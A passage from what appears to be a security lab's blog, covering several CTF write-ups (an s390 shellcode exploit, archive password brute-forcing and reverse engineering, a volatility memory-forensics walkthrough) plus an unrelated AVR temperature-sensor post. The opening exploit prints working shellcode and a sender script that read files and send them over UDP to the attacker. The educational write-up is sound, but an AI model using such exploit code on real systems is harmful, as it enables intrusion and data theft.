and send it to the remote machine:import socket import subprocess SERVER_IP = "109.233.61.11" CLIENT_IP = # local ip UDP_PORT = 31337 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto("Hi !", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] port = sock.getsockname()[1] asm = open("exploit200.s").read() asm = asm.replace("____", hex(port)[2:]) asm = asm.replace("-------", CLIENT_IP) p = subprocess.Popen("s390-linux-as -o exploit200", stdin=subprocess.PIPE, shell=True) p.communicate(asm) p = subprocess.Popen("s390-linux-objcopy -O binary exploit200 /dev/stdout", stdout=subprocess.PIPE, shell=True) sock.sendto(p.communicate()[0], (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] sock.sendto("\x31\xee\xdf\xb4", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0]
Listing the current directory
The first step of this exploit is to list the current directory to find the file which contains the flag. This can be done by filling a buffer with
getdents
syscall and then send it via UDP to the local machine..long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, dir lhi %r3, 0 lhi %r4, 0 svc 0 /*getdents*/ lhi %r1, 141 lgr %r3,%r11 afi %r3, 4096 lghi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- dir: .string "."
Response:
\x00\x00\x00\x00\x00\x00\x00\x11\x0fe\x95\xe2\xb6>!I\x00 nohup.out\x00\x00 \x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x12\x1c\t^\r\x82\x91T\xe0\x00\x18 zpwn\x00\x08\x00\x00\x00\x00\x00\x00\x00\x0c2z)5\x13T\xc6\x17\x00\x18.\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x13?F\xf4bC\\\xcf\xda\x00( .bash_history\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00 \x00\rB\xf6H\x1f\x00 \xb1\xb4\x00 .bash_logout\x00\x08\x00\x00\x00\x00\x00 \x00\x00\x0fN_\x88r\x1b\xbc\x90L\x00 .bashrc\x00\x00\x00\x00\x00\x00\x08 \x00\x00\x00\x00\x00\x00\x00\x02OpO/F\x88\x8f\x00\x00\x18..\x00\x00\x00 \x04\x00\x00\x00\x00\x00\x00\x00\x0eY{P\xb5\xc3\xe0\x02\xf0\x00 .profile \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x16m\x9cn\xc56.\x9a\x91 \x00 watchdog.sh\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x7f\xff\xff\xff \xff\xff\xff\xff\x00 flag.txt\x00\x00\x00\x00\x00\x08
Thanks to
getdents
’s buffer, we can then see that a fileflag.txt
exists in the current directory.Reading flag.txt
Let’s try to open
flag.txt
and read its contents:.long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, flag lhi %r3, 0 lhi %r4, 0 svc 0 /*read*/ lhi %r1, 3 lgr %r3,%r11 afi %r3, 4096 lhi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- flag: .string "./flag.txt"
And it worked, giving us the flag:
CTF{684eed23a11fd416bb56b809d491eef4}
hack.lu 2013: FluxArchiv Write-up (both parts)
For this exercise with two parts (400 and 500 points), we were given too files: a binary named
archiv
and some data namedFluxArchiv.arc
. The two parts involved the same binary.When running the binary with no options, it displays an usage message containing the different options possible. We have:
- An option to list the files contained in the archive.
- An option to add a file to the archive.
- An option to extract a file from the archive.
- An option to delete a file in the archive.
Every command takes at least the archive name and a password. The last three also take a filename.
If you want to try it, it was dumped here, thanks to Jonathan Salwan.
Part 1: Find the password
Sooo, the first part of the exercise requires us to find the password of the archive
FluxArchiv.arc
given. We started reversing the binary and noticed a first thing: Awesome, the symbols were not stripped! … Well actually they were shuffled, which is not that good, but it is not a real problem either. In this write-up, We will always keep the wrong names, but explain what they actually do.We started following the path in
main
that lists the files and followed the code to understand what is done to the password. This can be easily done by following parsing of the command line arguments.The first function called on the password argument is incorrectly named
checkHashOfPassword
. It will initialize a global buffer of length0x14
namedhash_of_password
(correctly) with the SHA-1 digest of the given password. This function is simple.If we continue to follow the listing option, it then checks that it can
access
the archive file given,fopen
s it and then callsencryptDecryptData
, that really only checks the magic number of the archive format, at position0x0
:FluxArhiv13
.If this went OK, it will then call
verifyArchiv
. This function will do the interesting thing for this part. It will check that our password is correct.It first
fseek
s to offset0xC
, and then reads0x14
from the archive: another SHA-1 digest. Then it will fill an internal buffer with a re-ordered version ofhash_of_password
. It will then take this buffer and calculate the SHA-1 digest of it. This digest is compared to the one read from the archive. If it matches, the password is good.So, in summary, the password is good if
sha1(reorder(sha1(password)))
equals to the20
bytes at offset0xC
in the archive.The subject says that the humans who created the archive were drunk and decided to use a 6 character, upper-case or digit password. That is
2.176.782.336
passwords possible. That looks brute-force worthy.We first wrote the reordering part (the one that calculates the source index) in python to compute them all. Once done, we decided to write something to brute-force the algorithm. The source code of the brute-forcer can be found here. With 8 threads, it takes 2 minutes and 30-something seconds to go through the whole password space on my i7, and outputs one password:
PWF41L
.Part 1 solved. For those interested, the archive contains 3 images and one mp3 file. They are not really useful.
Part 2: Find more!
OK so now that we have the password we can decrypt the data. Yes, indeed, the data is encrypted with RC4, using
hash_of_password
as the key. The decrypt part is in the functionsanitizeFilename
. First interesting thing: it is called a lot, and it always resets RC4. So you can’t decipher the whole archive in one shot. Damn, we must understand the format then.The code is quite simple, but I am honestly bad at reverse engineering, so I decided to take this opportunity to try another approach for once: rewrite the program in C.
The complete source code can be downloaded here. It doesn’t contain the whole program but only the parts I needed to understand what the program was doing and how to finish this part.
I started by scrolling the functions randomly and trying to understand the simple ones. One that was really useful was
listAllFilesInArchiv
.First, we can see in it a pattern we will find a lot: read 8 bytes, decrypt it and reverse it in a value byte per byte. I called this function
read_int
in my C code, it reads a 64-bit integer and switches its endianness.So the function reads two integers (
a
andb
) and then starts to do the interesting thing: It will clear both with zeros. Then it clears a field of size0x10
, and then a field of size0x60
.Another pattern we will find often is a loop for
i
from0
tob
excluded, seek toa
, read the integer at that position and use it as nexta
, then clear it and continue. In short,a
is the offset of the next block in a linked list of blocks, and the first block contains 4 fields, with the second one being the number of blocks. Later we discovered that this is necessary because the last block doesn’t begin with an offset set to 0, but to some value to permit calculating its actual size. Here is the C:void listAllFilesInArchiv(FILE* stream, unsigned int off) { // delete_file char ptr[0x8]; uint64_t counter; uint64_t curpos; uint64_t nbblocks; uint64_t nextblock; fseek(stream, off, SEEK_SET); nextblock = read_int(stream); nbblocks = read_int(stream); fseek(stream, off, SEEK_SET); clear_data(stream, 8); clear_data(stream, 8); clear_data(stream, MD5_DIGEST_LENGTH); clear_data(stream, FILENAME_SZ); for (counter = 0; counter < nbblocks; ++counter) { fseek(stream, nextblock * 1040 + 0x20, SEEK_SET); curpos = ftell(stream); nextblock = read_int(stream); fseek(stream, curpos, SEEK_SET); clear_data(stream, 8); } }
The second interesting thing about this function is that it is called on delete (we can see it from command parsing). So an interesting thing rises: if a file was added and then deleted, its data is still present in the archive. It is only deleted from the listing and its blocks are considered “free”.
The offset given to it comes from
extractFileFromArchiv
. This function starts by seeking to offset0x20
, so just after the global magic + the SHA-1 for the password. It checks a magic (“FluXL1sT”), then reads an integer and then checks for 8 structures of 128 bytes. This is the index! The integer read, if not null, is a link to the next list of 8 files (still beginning by the magic).Now we have enough to use my technique to find the unused blocks, but I actually rewrote the complete file listing and extraction to make sure I did it correctly. I then basically logged every block used: all blocks used are 1040 bytes long (this is why we have 8 entries of 128 bytes). I then compared it to the possible list of blocks and just decrypted these blocks. The key was in block at address
0x28a20 + 0x8
:$ python hacklu2013-fluxarchiv-unused-blocks.py logs Found unused block: 0x28200 Found unused block: 0x28610 Found unused block: 0x28a20 [...] $ python hacklu2013-fluxarchiv-decrypt.py 0x28a28 0x410 b"[...] alike.\n\n+++The Mentor+++\n\nFlag: D3letinG-1nd3x_F4iL\n\n[...]"
Example logs here.
Conclusion
I didn’t finish the second part in time to have the points. I actually used techniques that took a lot of time, and I was quite slow anyway. My goal was not productivity. I took the first part as an opportunity to check that I remembered how to use
pthread
and the second part as a good example to try another technique for reverse engineering I never used before. Although it was a “slow” technique, it really helped me organise my thoughts and test/fetch data (like the offsets of used blocks, even though it was possible without).It was interesting to see. Next time will be for speed!
Dealing with the pull-up resistors on AVR
My internship project was to design a temperature monitoring system for the LSE server room. Several homemade temperature probes, based on NTC thermistors, are now arranged in the laboratory. Each of them is connected to a USB interface with a RJ-45 cable.
The interface is based on an Atmel
AT90USBKEY
, a development board based on anAT90USB1287
microcontroller. It features a 10-bit successive approximation Analog-to-Digital Converter connected to an 8-channel Analog Multiplexer and a USB controller, which allows us to create a proper USB HID device.The host probes the interface to get the values of the different temperature sensors and collects them thanks to StatsD. The interface is exposed as a character device if it’s binded to the appropriate driver and can communicate with the user space via
ioctl()
syscall.In our case, the interface is connected to a Sheevaplug, an ARM-based plug computer, which probes the values every 10 seconds and send them to the StatsD server via UDP.
The first problem I had to face is the strange values returned by the ADC on the channels 4 to 7 when no analog pin is connected:
$ cat /proc/temp_sensors T0: 478 T1: 473 T2: 471 T3: 383 T4: 1019 T5: 1023 T6: 1023 T7: 1023
1023 is the maximum value of the ADC result, this means that the analog inputs were subject to a voltage equal to the reference voltage (here, Varef = 3.3V).
Thanks to
AT90USB1287
documentation, we can see that pins PF4, PF5, PF6 and PF7 are also used by the JTAG interface.Port F pins alternate functions
If the JTAG interface is enabled, the pull-up resistors on pins PF7(TDI), PF5(TMS) and PF4(TCK) will be activated even if a Reset occurs. (AT90USB1287 specifications, Page 88)
In fact, it seems that the pin PF6 (TDO) pull-up resistor is also activated when the JTAG interface is enabled.
The input impedance of a converter is very high (due to internal operational amplifier), this justifies the fact that we find the voltage reference in the analog channels 4 to 7.
If we wanted to keep the JTAG enabled, the schematic of the electronic circuit would be:
The equivalent resistor Rh can easily be calculated:
Then, the resistance of the thermistor, which represents the current temperature, is given by:
Theoretically, we could consider this pull-up resistor in the calculation of the thermistor. However, the
AT90USB1287
specifications indicate that the values of the pull-up resistors are contained between 20KΩ and 50KΩ. This interval is too large to properly calibrate the sensors.Never mind: let’s disable the JTAG interface! We don’t really need it in our case.
The first way to do it is to unprogram JTAGEN fuse of the microcontroller. However, I can only use DFU (Device Firmware Upgrade) to program the device because I do not have the required equipment to use ICSP, JTAG or parallel programming for this kind of chip and, unfortunately, Fuses cannot be reprogrammed by the bootloader.
The other way is to set the bit JTD in the MCUCR register. In order to avoid unintentional disabling or enabling, the specifications ask to the application software to write this bit to the desired value twice within four cycles to change its value. This can be done with the following instructions:
asm volatile ("out %1, %0" "\n\t" "out %1, %0" "\n\t" : : "r" ((uint8_t) 1 << JTD), "i" (_SFR_IO_ADDR(MCUCR)));
Afterwards, the analog inputs 4 to 7 will get a normal behaviour and we can now use them to collect the different temperatures.
$ cat /proc/temp_sensors T0: 478 T1: 383 T2: 348 T3: 376 T4: 310 T5: 278 T6: 257 T7: 107
All values returned by the device are proportional to the thermistors voltage. As Negative Temperature Coefficient thermistors, their resistance goes up as temperature goes down and the temperature/resistance curve is not linear. The temperature (°C) can be calculated from this resistance with the following expression:
- Rt = thermistor resistance (Ω)
- Rh = second bridge resistor (Ω)
- β = NTC parameter equation (here, β = 4092)
- T0 = 298 °K (273 °K + 25 °K)
- K0 = 273 °K (= 0 °C)
Finally, this temperature monitoring system seems to work and we are now able to see how temperatures of the laboratory evolves as a function of time.
Evolution of temperatures (°C) as a function of time
LSE Summer Week 2013 Videos
The videos for the LSE Summer Week 2013 are now available, you can find all of them on the page of the event.
All the talks are in French, but the slides are in English.
They are available as a direct download or a youtube link. There are 2 videos that are still missing, they will be available as soon as we get them.
For the LSE Winter Day 2013, we had some issues with the recording, but we have uploaded them anyway, you can see them on youtube, or directly on the event page, sorry in advance for the bad recording.
ebCTF 2013: FOR100
After a recent attack, we found this encrypted file. Luckily, we made a memory dump, can you decrypt the file? Archive password: lcoXse3oa3Uicioc http://ebctf.nl/files/883f6fdf1a87b7651b7216e1354a7e1f/flag http://194.171.96.106/ebctf/memory.7z
We took this exercise as an opportunity to learn to use volatility, so this writeup will be a little overcomplicated, we could have just done it with strings/grep, but it was a great way to learn more about how to search and exploit memory dump.
To begin with, we have a memory dump of a VirtualBox VM :
$ file memory.dump memory.dump: ELF 64-bit LSB core file x86-64, version 1 (SYSV) $ readelf -n memory.dump Notes at offset 0x000002a8 with length 0x00000480: Owner Data size Description VBCORE 0x00000018 Unknown note type: (0x00000b00) VBCPU 0x00000440 Unknown note type: (0x00000b01)
A little examination of the raw data indicates that it should be a linux, as we see the grub code in memory, and some indication of a kernel version :
BOOT_IMAGE=/boot/vmlinuz-3.5.0-23-generic root=UUID=d45d9170-0f93-4ff4-b5a5-be89760c0d77 ro
A little more search indicates that it is an Ubuntu 12.04
x86_64
image.In order to use volatility on linux dumps, we must build or find a profile of the kernel. Instructions for building a profile for a kernel can be found here.
With this profile in place we can now start to tinker with our dump. Let’s start with the process list :
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_pslist Volatile Systems Volatility Framework 2.3_beta Offset Name Pid Uid Gid DTB Start Time ------------------ -------------------- --------------- --------------- ------ ------------------ ---------- 0xffff88000f9b0000 init 1 0 0 0x000000000aff1000 2013-07-21 19:19:32 UTC+0000 0xffff88000f9b1700 kthreadd 2 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f9b2e00 ksoftirqd/0 3 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa48000 migration/0 6 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa49700 watchdog/0 7 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4ae00 cpuset 8 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4c500 khelper 9 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4dc00 kdevtmpfs 10 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa68000 netns 11 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa69700 sync_supers 12 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6ae00 bdi-default 13 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6c500 kintegrityd 14 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6dc00 kblockd 15 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb00000 ata_sff 16 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb01700 khubd 17 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb02e00 md 18 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db90000 khungtaskd 21 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db91700 kswapd0 22 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db92e00 ksmd 23 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db94500 fsnotify_mark 24 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db95c00 ecryptfs-kthrea 25 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f0000 crypto 26 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a5c00 kthrotld 35 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a2e00 scsi_eh_0 36 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a1700 kworker/u:2 37 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a0000 scsi_eh_1 38 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f5c00 scsi_eh_2 39 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f4500 kworker/u:3 40 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f1700 binder 42 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f011700 deferwq 62 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f012e00 charger_manager 63 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f014500 devfreq_wq 64 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000ee35c00 jbd2/sda1-8 201 0 0 ------------------ 2013-07-21 19:19:33 UTC+0000 0xffff88000ee30000 ext4-dio-unwrit 202 0 0 ------------------ 2013-07-21 19:19:33 UTC+0000 0xffff88000ec7dc00 kworker/0:3 220 0 0 ------------------ 2013-07-21 19:19:35 UTC+0000 0xffff88000ec78000 upstart-udev-br 288 0 0 0x000000000ada3000 2013-07-21 19:19:37 UTC+0000 0xffff88000f2ddc00 udevd 332 0 0 0x000000000ef46000 2013-07-21 19:19:37 UTC+0000 0xffff88000c291700 udevd 496 0 0 0x000000000c2a6000 2013-07-21 19:19:37 UTC+0000 0xffff88000c292e00 udevd 497 0 0 0x000000000c2c1000 2013-07-21 19:19:37 UTC+0000 0xffff88000c838000 kpsmoused 546 0 0 ------------------ 2013-07-21 19:19:37 UTC+0000 0xffff88000c4c9700 upstart-socket- 638 0 0 0x000000000d939000 2013-07-21 19:19:38 UTC+0000 0xffff88000ee31700 dhclient3 706 0 0 0x000000000f0fb000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cc500 rsyslogd 720 101 103 0x000000000c600000 2013-07-21 19:19:38 UTC+0000 0xffff88000c83ae00 sshd 729 0 0 0x000000000bbce000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cdc00 dbus-daemon 759 102 105 0x000000000c538000 2013-07-21 19:19:38 UTC+0000 0xffff88000d1aae00 getty 822 0 0 0x000000000c641000 2013-07-21 19:19:38 UTC+0000 0xffff88000c62c500 getty 827 0 0 0x000000000d98c000 2013-07-21 19:19:38 UTC+0000 0xffff88000c839700 login 831 0 1000 0x000000000f28d000 2013-07-21 19:19:38 UTC+0000 0xffff88000c83dc00 getty 832 0 0 0x000000000d9c1000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cae00 getty 834 0 0 0x000000000c684000 2013-07-21 19:19:38 UTC+0000 0xffff88000d0a4500 acpid 837 0 0 0x000000000c315000 2013-07-21 19:19:39 UTC+0000 0xffff88000c83c500 cron 839 0 0 0x000000000d9da000 2013-07-21 19:19:39 UTC+0000 0xffff88000d1a9700 atd 840 0 0 0x000000000c327000 2013-07-21 19:19:39 UTC+0000 0xffff88000da11700 login 896 0 1000 0x000000000ae44000 2013-07-21 19:19:39 UTC+0000 0xffff88000c514500 whoopsie 901 103 106 0x000000000dae3000 2013-07-21 19:19:39 UTC+0000 0xffff88000bb15c00 bash 1064 1000 1000 0x000000000c6f0000 2013-07-21 19:19:46 UTC+0000 0xffff88000af90000 kworker/0:0 1313 0 0 ------------------ 2013-07-21 19:24:35 UTC+0000 0xffff88000af94500 kworker/0:2 1314 0 0 ------------------ 2013-07-21 19:29:36 UTC+0000 0xffff88000af91700 kworker/0:1 1315 0 0 ------------------ 2013-07-21 19:34:37 UTC+0000 0xffff88000af95c00 kworker/0:4 1316 0 0 ------------------ 2013-07-21 19:35:46 UTC+0000 0xffff88000af92e00 python2 1317 1000 1000 0x000000000c6fb000 2013-07-21 19:36:09 UTC+0000 0xffff88000d0a5c00 bash 1454 1000 1000 0x000000000d8c8000 2013-07-21 19:36:23 UTC+0000 0xffff88000f9b4500 flush-8:0 1552 0 0 ------------------ 2013-07-21 19:36:28 UTC+0000
As we can see here, we have a python2 instance launched (pid 1317). Let’s examine the bash history, in order to see exactly what and how it has been launched. It is a quite long process, but with it we should be able to see exactly what was launched.
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_bash Volatile Systems Volatility Framework 2.3_beta Pid Name Command Time Command -------- -------------------- ------------------------------ ------- 1064 bash 2013-07-21 19:19:47 UTC+0000 ps aux | grep ssh 1064 bash 2013-07-21 19:19:47 UTC+0000 sudo poweroff 1064 bash 2013-07-21 19:19:47 UTC+0000 ip addr 1064 bash 2013-07-21 19:20:53 UTC+0000 ls 1064 bash 2013-07-21 19:21:05 UTC+0000 python2 ctf.py 1064 bash 2013-07-21 19:21:29 UTC+0000 python2 ctf.py ' i hide my ' 1454 bash 2013-07-21 19:36:23 UTC+0000 ps aux | grep ssh 1454 bash 2013-07-21 19:36:23 UTC+0000 sudo poweroff 1454 bash 2013-07-21 19:36:23 UTC+0000 ip addr 1454 bash 2013-07-21 19:36:29 UTC+0000 ps aux | grep python 1454 bash 2013-07-21 19:37:04 UTC+0000 kill -s SIGUSR1 1317
Ok, so we have a python2 script
ctf.py
launched and after that, killed by aSIGUSR1
signal.If the code should still be in memory, but sadly, not in python memory, as was compiled before and the second launched should only load the
pyc
file.But if we search in memory, we can simply grep for
SIGUSR1
there should not be a lot of instance of it. And with that we get :import sys import time import random import signal from Crypto.Cipher import AES key1 = "is this where" key2 = sys.argv[1] key3 = raw_input("Password: ") iv = 'a very random iv' secret = './flag' mode = AES.MODE_CBC def encrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) inp = raw_input("Enter secret: ") diff = len(inp) % 16 if diff != 0: inp += ' ' * (16 - diff) with open(secret, 'wb') as outfile: outfile.write(enc.encrypt(inp)) del key, enc def decrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) with open(secret, 'rb') as infile: print(enc.decrypt(infile.read(48))) del key, enc signal.signal(signal.SIGUSR1, encrypt) signal.signal(signal.SIGUSR2, decrypt) while True: time.sleep(1)
Now we have the code. There is a decrypt function that should give us the flag. we have found
key2
in the bash history, it was' i hide my '
. What we still miss is thekey3
string. So let’s look at the python process memory.$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_proc_maps -p 131 Volatile Systems Volatility Framework 2.3_beta Pid Start End Flags Pgoff Major Minor Inode File Path -------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- -------------------------------------------------------------------------------- $ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_proc_maps -p 1317 Volatile Systems Volatility Framework 2.3_beta Pid Start End Flags Pgoff Major Minor Inode File Path -------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- -------------------------------------------------------------------------------- 1317 0x0000000000400000 0x0000000000671000 r-x 0x0 8 1 1273 /usr/bin/python2.7 1317 0x0000000000870000 0x0000000000871000 r-- 0x270000 8 1 1273 /usr/bin/python2.7 1317 0x0000000000871000 0x00000000008da000 rw- 0x271000 8 1 1273 /usr/bin/python2.7 1317 0x00000000008da000 0x00000000008ec000 rw- 0x0 0 0 0 1317 0x0000000002109000 0x0000000002200000 rw- 0x0 0 0 0 [heap] 1317 0x00007f7e9a000000 0x00007f7e9a001000 rw- 0x0 0 0 0 1317 0x00007f7e9a001000 0x00007f7e9a009000 r-x 0x0 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a009000 0x00007f7e9a208000 --- 0x8000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a208000 0x00007f7e9a209000 r-- 0x7000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a209000 0x00007f7e9a20a000 rw- 0x8000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a20a000 0x00007f7e9a4d3000 r-- 0x0 8 1 8358 /usr/lib/locale/locale-archive 1317 0x00007f7e9a4d3000 0x00007f7e9a4e8000 r-x 0x0 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a4e8000 0x00007f7e9a6e7000 --- 0x15000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e7000 0x00007f7e9a6e8000 r-- 0x14000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e8000 0x00007f7e9a6e9000 rw- 0x15000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e9000 0x00007f7e9a89e000 r-x 0x0 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9a89e000 0x00007f7e9aa9d000 --- 0x1b5000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aa9d000 0x00007f7e9aaa1000 r-- 0x1b4000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aaa1000 0x00007f7e9aaa3000 rw- 0x1b8000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aaa3000 0x00007f7e9aaa8000 rw- 0x0 0 0 0 1317 0x00007f7e9aaa8000 0x00007f7e9aba3000 r-x 0x0 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9aba3000 0x00007f7e9ada2000 --- 0xfb000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada2000 0x00007f7e9ada3000 r-- 0xfa000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada3000 0x00007f7e9ada4000 rw- 0xfb000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada4000 0x00007f7e9adba000 r-x 0x0 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9adba000 0x00007f7e9afb9000 --- 0x16000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afb9000 0x00007f7e9afba000 r-- 0x15000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afba000 0x00007f7e9afbb000 rw- 0x16000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afbb000 0x00007f7e9b15a000 r-x 0x0 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b15a000 0x00007f7e9b359000 --- 0x19f000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b359000 0x00007f7e9b374000 r-- 0x19e000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b374000 0x00007f7e9b37f000 rw- 0x1b9000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b37f000 0x00007f7e9b383000 rw- 0x0 0 0 0 1317 0x00007f7e9b383000 0x00007f7e9b3d5000 r-x 0x0 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b3d5000 0x00007f7e9b5d5000 --- 0x52000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5d5000 0x00007f7e9b5d8000 r-- 0x52000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5d8000 0x00007f7e9b5de000 rw- 0x55000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5de000 0x00007f7e9b5df000 rw- 0x0 0 0 0 1317 0x00007f7e9b5df000 0x00007f7e9b5e1000 r-x 0x0 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b5e1000 0x00007f7e9b7e0000 --- 0x2000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e0000 0x00007f7e9b7e1000 r-- 0x1000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e1000 0x00007f7e9b7e2000 rw- 0x2000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e2000 0x00007f7e9b7e4000 r-x 0x0 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b7e4000 0x00007f7e9b9e4000 --- 0x2000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e4000 0x00007f7e9b9e5000 r-- 0x2000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e5000 0x00007f7e9b9e6000 rw- 0x3000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e6000 0x00007f7e9b9fe000 r-x 0x0 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9b9fe000 0x00007f7e9bbfd000 --- 0x18000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbfd000 0x00007f7e9bbfe000 r-- 0x17000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbfe000 0x00007f7e9bbff000 rw- 0x18000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbff000 0x00007f7e9bc03000 rw- 0x0 0 0 0 1317 0x00007f7e9bc03000 0x00007f7e9bc25000 r-x 0x0 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007f7e9bca2000 0x00007f7e9bd96000 rw- 0x0 0 0 0 1317 0x00007f7e9bd97000 0x00007f7e9be1f000 